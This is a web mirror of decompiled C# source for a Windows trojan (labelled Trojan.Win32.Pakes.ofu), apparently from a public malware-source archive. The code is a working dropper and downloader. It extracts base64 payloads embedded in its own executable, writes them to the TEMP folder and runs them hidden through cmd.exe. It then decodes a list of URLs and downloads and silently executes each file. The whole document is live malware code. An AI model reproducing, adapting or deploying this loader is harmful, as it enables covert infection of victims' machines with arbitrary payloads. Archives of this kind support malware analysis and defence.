mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-20 18:36:10 +00:00
134 lines
5.1 KiB
C#
134 lines
5.1 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
|
// Type: n.C
|
|||
|
|
// Assembly: g, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
|
// MVID: BF8D38A2-3CA7-4EC1-9420-BC56FCE07E26
|
|||
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Pakes.ofu-ec9586122f78047c38e5841b03c6769a50700bb509faa299b7aa58a58ef67877.exe
|
|||
|
|
|
|||
|
|
using Microsoft.VisualBasic;
|
|||
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|||
|
|
using System;
|
|||
|
|
using System.Collections;
|
|||
|
|
using System.Net;
|
|||
|
|
using System.Text;
|
|||
|
|
|
|||
|
|
namespace n
|
|||
|
|
{
|
|||
|
|
public class C
|
|||
|
|
{
|
|||
|
|
[STAThread]
|
|||
|
|
public static void main()
|
|||
|
|
{
|
|||
|
|
string str1 = "CMD.exe /k start %TEMP%\\";
|
|||
|
|
string Expression1 = "TEMP";
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
C c1 = new C();
|
|||
|
|
Array Instance1 = (Array) Strings.Split(System.IO.File.ReadAllText(AppDomain.CurrentDomain.FriendlyName), "**");
|
|||
|
|
Array Instance2 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
|
|||
|
|
{
|
|||
|
|
(object) 1
|
|||
|
|
}, (string[]) null)), "&");
|
|||
|
|
Array Instance3 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
|
|||
|
|
{
|
|||
|
|
(object) 0
|
|||
|
|
}, (string[]) null)), "\r\n");
|
|||
|
|
Array Instance4 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
|
|||
|
|
{
|
|||
|
|
(object) 1
|
|||
|
|
}, (string[]) null)), "\r\n");
|
|||
|
|
int num1 = checked (Instance4.Length - 2);
|
|||
|
|
int num2 = 0;
|
|||
|
|
while (num2 <= num1)
|
|||
|
|
{
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
System.IO.File.WriteAllBytes(Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\" + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
|
|||
|
|
{
|
|||
|
|
(object) num2
|
|||
|
|
}, (string[]) null))), c1.v(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance4, new object[1]
|
|||
|
|
{
|
|||
|
|
(object) num2
|
|||
|
|
}, (string[]) null))));
|
|||
|
|
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
|
|||
|
|
{
|
|||
|
|
(object) num2
|
|||
|
|
}, (string[]) null))), AppWinStyle.Hide);
|
|||
|
|
}
|
|||
|
|
catch (Exception ex)
|
|||
|
|
{
|
|||
|
|
ProjectData.SetProjectError(ex);
|
|||
|
|
ProjectData.ClearProjectError();
|
|||
|
|
}
|
|||
|
|
checked { ++num2; }
|
|||
|
|
}
|
|||
|
|
if (Operators.CompareString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
|
|||
|
|
{
|
|||
|
|
(object) 2
|
|||
|
|
}, (string[]) null).ToString(), "^", false) == 0)
|
|||
|
|
return;
|
|||
|
|
C c2 = c1;
|
|||
|
|
Array Instance5 = Instance1;
|
|||
|
|
object[] objArray1 = new object[1];
|
|||
|
|
object[] objArray2 = objArray1;
|
|||
|
|
int num3 = 2;
|
|||
|
|
// ISSUE: variable of a boxed type
|
|||
|
|
__Boxed<int> local1 = (ValueType) num3;
|
|||
|
|
objArray2[0] = (object) local1;
|
|||
|
|
object[] Arguments = objArray1;
|
|||
|
|
string str2 = Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance5, Arguments, (string[]) null));
|
|||
|
|
ref string local2 = ref str2;
|
|||
|
|
string Expression2 = c2.t(ref local2);
|
|||
|
|
NewLateBinding.LateIndexSetComplex((object) Instance1, new object[2]
|
|||
|
|
{
|
|||
|
|
(object) num3,
|
|||
|
|
(object) str2
|
|||
|
|
}, (string[]) null, true, false);
|
|||
|
|
Array array = (Array) Strings.Split(Expression2, "\r\n");
|
|||
|
|
int num4 = 0;
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
foreach (object obj in array)
|
|||
|
|
{
|
|||
|
|
string str3 = Conversions.ToString(obj);
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
if (Operators.CompareString(str3, "", false) == 0)
|
|||
|
|
ProjectData.EndApp();
|
|||
|
|
Array Instance6 = (Array) Strings.Split(str3, ".");
|
|||
|
|
new WebClient().DownloadFile(str3, Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
|
|||
|
|
{
|
|||
|
|
(object) checked (Instance6.Length - 1)
|
|||
|
|
}, (string[]) null))));
|
|||
|
|
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + "F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
|
|||
|
|
{
|
|||
|
|
(object) checked (Instance6.Length - 1)
|
|||
|
|
}, (string[]) null))), AppWinStyle.Hide);
|
|||
|
|
checked { ++num4; }
|
|||
|
|
}
|
|||
|
|
catch (Exception ex)
|
|||
|
|
{
|
|||
|
|
ProjectData.SetProjectError(ex);
|
|||
|
|
ProjectData.ClearProjectError();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
finally
|
|||
|
|
{
|
|||
|
|
IEnumerator enumerator;
|
|||
|
|
if (enumerator is IDisposable)
|
|||
|
|
(enumerator as IDisposable).Dispose();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
catch (Exception ex)
|
|||
|
|
{
|
|||
|
|
ProjectData.SetProjectError(ex);
|
|||
|
|
ProjectData.ClearProjectError();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
public byte[] v(string s) => Convert.FromBase64String(s);
|
|||
|
|
|
|||
|
|
public string t(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(s));
|
|||
|
|
}
|
|||
|
|
}
|